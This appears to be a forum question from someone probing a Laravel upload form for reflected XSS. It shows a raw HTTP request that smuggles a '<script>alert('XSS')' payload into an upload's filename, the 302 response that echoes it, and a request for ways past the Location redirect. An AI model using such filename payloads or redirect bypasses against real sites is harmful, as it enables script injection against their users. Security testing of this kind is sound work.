In some basic steps:
- POST Request containing a photo with multipart/form-data.
- HTTP/1.1 302 Found respond with redirect back to formular
- Redirect to initial formular.
In case 1 we are able to control the filename allowing us to use any kind of payload we want.
In case 2 we are able to see in response the XSS payload, but no execution (let the fun begin) because of Location header.
In case 3 we see the file name which is laravael encoded response... => no XSS.
Explained:
Step 1:
POST /upload/file HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/upload
Content-Type: multipart/form-data; boundary=---------------------------172863706614177227892012498540
Content-Length: 8331
Cookie: laravel_session=not_your_problem
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------172863706614177227892012498540
Content-Disposition: form-data; name="doc_1"; filename="<!DOCTYPE html><script>alert('XSS'); .png"
Content-Type: image/png
Step 2:
HTTP/1.1 302 Found
Server: nginx/1.12.2
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache
Location: https://example.com/upload
Date: Tue, 08 May 2018 12:49:50 GMT
Set-Cookie: laravel_session=laravel_session=not_your_problem; path=/
Strict-Transport-Security: max-age=31536000
Content-Length: 535
adding: <!DOCTYPE html><script>alert('XSS'); .png (deflated 14%)
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="1;url=https://example.com/upload" />
From what I know of Laravel framework and other websites, applications and so on add a content base redirect (even if there is a header one like Location) for extra redundancy like <meta http-equiv="refresh" content="1;url=something"
.
In what circumstances and how I might be able to bypass the Location header in order to execute my content and therefore my XSS?